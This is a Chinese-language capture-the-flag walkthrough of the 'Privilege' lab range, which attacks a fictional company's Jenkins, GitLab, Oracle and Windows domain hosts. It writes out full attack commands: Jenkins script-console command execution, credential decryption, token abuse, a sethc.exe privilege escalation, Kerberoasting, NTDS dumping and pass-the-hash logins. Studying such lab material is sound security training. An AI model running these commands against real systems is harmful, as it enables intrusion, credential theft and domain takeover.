春秋云镜-Privilege
在这个靶场中,您将扮演一名资深黑客,被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用,并通过后渗透技巧深入 XR Shop 的内部网络,寻找潜在的弱点和漏洞,并通过滥用 Windows 特权获取管理员权限,最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag,分布于不同的靶机。
第一关
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
fscan起手
1 | E:\小工具\fscan>fscan -h 39.99.134.90 |
有源码备份 下载审计一下
1 |
|
直接读取文件并echo出来了
读取密码
读取flag
第二关
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
拿到密码登录后台
http://39.99.134.90:8080/manage/script可以执行命令
1 | println("whoami".execute().text) |
添加用户
1 | println("net user yiyi qwer1234! /add".execute().text) |
rdp连接
C:\ProgramData\Jenkins.jenkins\credentials.xml找到apjtoken
拿到console中去解密一下
1 | println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText()) |
得到明文
1 | glpat-7kD_qLH2PiQv_ywB9hz2 |
扫内网扫到gitlab
1 | C:\Users\yiyi\Desktop>fscan.exe -h 172.22.14.7/24 |
拿token去
1 | C:\Users\31702\Downloads>curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" |
下载下来
1 | C:\Users\31702\Downloads>git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git |
username: xradmin
password: fcMyE8t9E4XdsKf
直接使用odat
1 | proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user yiyi qwer1234! /add' |
拿到flag2
第三关
攻击办公区内网,获取办公 PC 控制权限,并通过特权滥用提升至 SYSTEM 权限。
internal-secret中拿到一堆账密 对应扫出来的0923的主机
1 | XR-0923 | zhangshuai | wSbEajHzZs |
1 | C:\Users\zhangshuai>whoami /priv |
发现可以远程登录
1 | proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs |
1 | ┌──(root㉿kali)-[~] |
因为有SeRestorePrivilege,所以能无视ACL修改文件或者编辑注册表,类似于之前的放大镜提权,我们可以把cmd.exe重命名为sethc.exe,然后在锁屏界面连按五次shift启动sethc提权
1 | *Evil-WinRM* PS C:\Users\zhangshuai\Documents> cd C:\ |
ctrl+fn+alt+键盘右键锁屏然后读flag,并且创建一个新用户
创建个administrator用户进入
第四关
尝试接管备份管理操作员帐户,并通过转储 NTDS 获得域管理员权限,最终控制整个域环境。
抓取密码
1 |
|
拿着XR-0923$的凭据去收集信息
1 | ┌──(root㉿kali)-[~] |
抓哈希
1 | proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':b486c9b11e2af380c736f0d618d9bc23' -dc-ip 172.22.14.11 -request-user tianjing |
如果时间差的大就同步一下
1 | ntpdate 172.22.14.11 |
得到密码拿hashcat爆破一下
得到
1 | tianjing:DPQSXSXgh2 |
evilwin
1 | ┌──(root㉿kali)-[~] |
有备份以及还原文件或目录的权限,可以卷影拷贝然后读sam(SAM是安全账户管理器数据库,包含了本地用户及用户组,包括它们的口令及其他属性,位于注册表的HKLM\SAM下面)
1 | ┌──(root㉿kali)-[~] |
最后用download下来的ntds.dit和system本地进行解密
1 | impacket-secretsdump -ntds ntds.dit -system system local |
1 | ┌──(root㉿kali)-[/tmp] |
登录
1 | proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277" |
拿到flag4